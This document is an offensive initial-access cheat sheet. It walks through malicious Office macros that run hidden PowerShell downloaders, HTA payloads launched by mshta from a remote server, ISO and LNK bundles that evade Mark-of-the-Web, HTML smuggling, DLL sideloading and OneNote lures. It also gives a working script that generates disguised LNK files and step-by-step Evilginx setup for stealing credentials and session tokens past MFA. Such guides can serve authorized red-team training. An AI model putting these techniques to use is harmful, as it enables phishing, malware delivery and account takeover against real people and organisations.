Initial Access Techniques

# VBA Macro Concepts for Word/Excel
# Save as .doc, .xls (not .docx, .xlsx)

# AutoOpen() - Runs when document opens
# Creates shell command to download and execute payload
# Shell cmd, vbHide - Runs hidden

# Example AutoOpen structure:
# Dim cmd As String
# cmd = "powershell -nop -w hidden -c IEX(...)"
# Shell cmd, vbHide

# Alternative: WMI spawn (evades some detection)
# Document_Open() uses WMI to create process
# GetObject("winmgmts:Win32_Process")
# objWMI.Create "powershell ..."

# Modern alternatives to macros:
# - VBA Stomping (hide malicious code)
# - XLM macros (Excel 4.0)
# - Add-ins (.xll files)
# - Template injection

<!-- HTA payload - mshta.exe executes HTML Applications -->
<html>
<head>
<HTA:APPLICATION ID="payload" WINDOWSTATE="minimize" SHOWINTASKBAR="no" />
</head>
<body>
<!-- VBScript runs shell command on load -->
<!-- Sub Window_onLoad creates shell, runs PowerShell, closes window -->
<!-- Example: objShell.Run "powershell -ep bypass -c IEX(...)" -->
</body>
</html>

<!-- Delivery: Send as .hta or host and use mshta URL -->
mshta http://server/payload.hta

# Alternative: Use JavaScript in HTA
# new ActiveXObject("WScript.Shell").Run("cmd /c calc")

# ISO files auto-mount on Windows 10/11
# Bypass Mark-of-the-Web (MOTW)

# Create ISO structure:
# - payload.exe (renamed to look legitimate)
# - shortcut.lnk (pointing to payload)
# - decoy.pdf (legitimate document)

# Create ISO on Linux
mkisofs -J -o payload.iso ./iso_contents/

# LNK file target:
# cmd.exe /c start /b payload.exe

# Or use PowerShell in LNK:
# powershell -w hidden -c "Start-Process payload.exe"

# HTML Smuggling Concepts

# How it works:
# 1. Embed base64-encoded payload in JavaScript
# 2. JavaScript decodes and creates Blob
# 3. Triggers automatic download
# 4. Bypasses email scanning since payload isn't in clear text

# JavaScript approach (pseudocode):
# var payload = 'TVqQAAMAAAA...';  // Base64 encoded payload
# var bytes = atob(payload);        // Decode base64
# var blob = new Blob([bytes]);     // Create Blob object
# var a = document.createElement('a');
# a.href = URL.createObjectURL(blob);
# a.download = 'update.iso';
# a.click();                        // Trigger download

# Tools for HTML smuggling:
# - smuggler (GitHub)
# - Outflank's tooling
# - Custom templates

# Delivery vectors:
# - Phishing emails with HTML attachments
# - Compromised web pages
# - Fake download portals

# Find sideload opportunities
# Legitimate signed EXE + malicious DLL in same directory

# Common sideload targets:
# - OneDrive.exe + version.dll
# - Teams.exe + various DLLs
# - Slack.exe + various DLLs

# Steps:
# 1. Find signed EXE that loads DLL from current directory
# 2. Create DLL with exported functions
# 3. Include malicious code in DllMain
# 4. Package EXE + DLL together

# Check for missing DLLs (ProcMon)
# Look for "NAME NOT FOUND" in DLL paths

# DLL proxy approach:
# Forward legitimate function calls to real DLL
# Execute malicious code during load

# OneNote allows embedding files
# Users can double-click to execute

# Attack flow:
# 1. Create .one file
# 2. Embed malicious file (HTA, BAT, EXE)
# 3. Cover with image saying "Click to view"
# 4. User clicks, confirms warning, executes

# OneNote sections (.one) structure:
# - Embedded objects stored in file
# - Can include any file type
# - Execution requires user click + confirmation

# Note: Microsoft has added more warnings
# But social engineering can still work

# LNK files can execute commands
# Often combined with ISO delivery

# PowerShell LNK generator
$obj = New-Object -ComObject WScript.Shell
$link = $obj.CreateShortcut("C:\temp\Document.lnk")
$link.WindowStyle = 7  # Minimized
$link.TargetPath = "C:\Windows\System32\cmd.exe"
$link.Arguments = "/c powershell -w hidden -ep bypass -c IEX(...)"
$link.IconLocation = "C:\Windows\System32\shell32.dll,1"  # Folder icon
$link.Save()

# Arguments to evade:
# /c start /b - Background execution
# powershell -w hidden - Hidden window
# -ep bypass - Execution policy bypass

# Install Gophish
wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-v0.12.1-linux-64bit.zip
./gophish

# Access admin panel: https://localhost:3333
# Default creds in terminal output

# Setup:
# 1. Configure sending profile (SMTP)
# 2. Create email template
# 3. Create landing page
# 4. Import users
# 5. Launch campaign

# Evilginx - Man-in-the-middle phishing
# Captures credentials AND session tokens (bypasses MFA)

# Install
git clone https://github.com/kgretzky/evilginx2
cd evilginx2
make

# Run
./evilginx -p ./phishlets

# Configure
: config domain yourdomain.com
: config ip YOUR_IP
: phishlets hostname microsoft365 login.yourdomain.com
: phishlets enable microsoft365
: lures create microsoft365

# Generate phishing URL
: lures get-url 0

# Captured sessions include:
# - Username/password
# - Session cookies
# - MFA tokens

# Exploit external services for initial access

# VPN vulnerabilities
# - Pulse Secure (CVE-2021-22893)
# - Fortinet (CVE-2022-40684)
# - Citrix (CVE-2023-3519)

# Exchange vulnerabilities
# - ProxyLogon (CVE-2021-26855)
# - ProxyShell (CVE-2021-34473)
# - ProxyNotShell (CVE-2022-41082)

# Web application vulnerabilities
# - Log4j (CVE-2021-44228)
# - Spring4Shell (CVE-2022-22965)

# Always check for:
# - Unpatched public-facing services
# - Default credentials
# - Known CVEs